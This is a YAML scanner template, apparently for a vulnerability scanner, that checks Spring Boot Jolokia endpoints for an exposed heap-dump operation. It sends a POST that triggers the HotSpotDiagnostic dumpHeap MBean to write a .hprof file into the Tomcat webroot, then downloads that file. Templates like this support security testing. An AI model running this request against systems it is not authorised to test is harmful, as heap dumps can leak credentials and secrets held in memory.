id: jolokia-dumpheap
single: true
info:
  name: Spring Jolokia Dump Heap
  risk: High

params:
  - root: '{{.BaseURL}}'

replicate:
  prefixes: 'actuator, api, admin, eureka'

variables:
  - vul: |
      /jolokia/
      /monitoring/json/
requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}{{.vul}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
      - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
      - Accept-Language: en-GB,en;q=0.5
      - Accept-Encoding: gzip, deflate
    body: |
      {
        "type":"EXEC",
        "mbean":"com.sun.management:type=HotSpotDiagnostic",
        "operation":"dumpHeap",
        "arguments":["/opt/tomcat/webapps/ROOT/test1.hprof",0]
      }

  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.vul}}test1.hprof
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 StringSearch("body", 'authentication')

references:
  - link: https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
  - tool: https://github.com/LandGrey/SpringBootVulExploit
